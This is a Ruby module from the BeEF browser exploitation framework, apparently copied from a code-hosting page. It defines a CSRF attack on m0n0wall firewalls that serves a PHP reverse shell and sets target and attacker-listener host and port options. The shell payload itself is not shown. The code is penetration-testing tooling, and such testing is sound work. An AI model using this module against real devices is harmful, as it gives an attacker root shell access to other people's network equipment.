29 lines
1.0 KiB
Ruby
29 lines
1.0 KiB
Ruby
#
|
|
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
|
|
def pre_send
|
|
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/m0n0wall/php-reverse-shell.php', '/php-reverse-shell', 'php')
|
|
end
|
|
|
|
def self.options
|
|
configuration = BeEF::Core::Configuration.instance
|
|
lhost = "#{configuration.get("beef.http.host")}"
|
|
lhost = "" if lhost == "0.0.0.0"
|
|
return [
|
|
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
|
|
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
|
|
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
|
|
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}
|
|
]
|
|
end
|
|
|
|
def post_execute
|
|
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('php-reverse-shell.php')
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|